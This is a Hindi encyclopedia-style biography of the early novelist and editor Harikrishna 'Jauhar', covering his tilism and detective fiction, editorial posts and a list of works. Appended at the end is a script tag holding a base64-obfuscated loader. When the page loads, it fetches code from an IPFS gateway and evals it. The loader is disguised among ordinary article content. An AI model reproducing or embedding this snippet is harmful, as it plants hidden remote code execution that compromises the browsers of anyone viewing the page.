हरिकृष्ण 'जौहर'
हरिकृष्ण 'जौहर' (जन्म- 1880, काशी, उत्तर प्रदेश; मृत्यु- 11 फ़रवरी, 1945, काशी) का नाम हिन्दी के आरम्भिक उपन्यास लेखकों में बड़े आदर के साथ लिया जाता है। इनका तिलस्मी तथा जासूसी उपन्यास लेखकों में महत्त्वपूर्ण स्थान है। हरिकृष्ण 'जौहर' ने तिलस्मी उपन्यासों की दिशा में बाबू देवकीनंदन खत्री द्वारा स्थापित उपन्यास परंपरा को विकसित करने में महत्वपूर्ण योगदान दिया था।
जन्म तथा लेखन कार्य
हरिकृष्ण 'जौहर' का जन्म 1880 में काशी (वर्तमान बनारस) के एक खत्री परिवार में हुआ था। इन्होंने अपना लेखन कार्य उर्दू से प्रारम्भ किया था। ‘राजे हैरत', 'हरीफ़’, ‘पुर असर जादू’ नामक उपन्यास लिखा और 'जौहर' उपनाम रखा।[1]
- 'कुसुमलता' की रचना
हरिकृष्ण जी की पहली हिन्दी रचना 'कुसुमलता' नामक उपन्यास है, जो चार भागों में है और उसकी पृष्ठभूमि 'अय्यरी' तथा 'तिलस्मी' है।
तिलिस्मी उपन्यास
हिंदी के आरंभिक उपन्यास लेखकों में बाबू हरिकृष्ण 'जौहर' का तिलस्मी तथा जासूसी उपन्यास लेखकों में महत्वपूर्ण स्थान है। तिलस्मी उपन्यासों की दिशा में हरिकृष्ण ने बाबू देवकीनंदन खत्री द्वारा स्थापित उपन्यास परंपरा को विकसित करने में महत्वपूर्ण योग दिया। आधुनिक जीवन की विषमाओं एवं सभ्य समाज के यथार्थ जीवन का प्रदर्शन करने के लिए ही बाबू हरिकृष्ण 'जौहर' ने जासूरी उपन्यासों का निर्माण किया। 'काला बाघ' और 'गवाह गायब' आपके इस दिशा में महत्वपूर्ण उपन्यास हैं।[2]
सम्पादक
'भारत जीवन प्रेस' की ओर से प्रकाशित 'भारत जीवन' नामक पत्र का संपादन इन्होंने किया था। काशी से प्रकाशित मित्र उपन्यास तरंग द्विजराज पत्रिका का संकलन किया तथा अजमेर से प्रकाशित 'राजस्थान पत्र' और बम्बई के 'वेकटेश्वर समाचार' के संपादक भी रहे।
कृतियाँ
हरिकृष्ण 'जौहर' की प्रमुख कृतियाँ इस प्रकार हैं-
- 'जापान वृतांत'
- 'अफ़ग़ानिस्तान का इतिहास'
- 'भारत के देशी राज्य'
- 'रूस जापान युद्ध'
- 'प्लासी की लड़ाई'
- 'सागर साम्राज्य सिख इतिहास'
- 'नेपोलियन वोनापार्ट'
- 'भूगर्भ के सेरे'
- 'विज्ञान व वाजीगर'
- 'कबीर तथा मैसूर'
हिन्दी प्रेस की स्थापना
काशी के मामूरगंज नामक स्थान पर हिन्दी प्रेस की स्थापना हरिकृष्ण 'जौहर' ने की और ‘आधार’ नामक हिन्दी साहित्यिक पत्र निकाला, जो 'हिटलर चेम्बरलिन सन्धि' के बाद बन्द कर दिया गया।
|
|
|
|
|
टीका टिप्पणी और संदर्भ
- ↑ काशी के साहित्यकार (हिन्दी)। । अभिगमन तिथि: 11 जनवरी, 2014।
- ↑ हिन्दी के लघु उपन्यास (हिन्दी)। । अभिगमन तिथि: 11 जनवरी, 2014।
संबंधित लेख
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>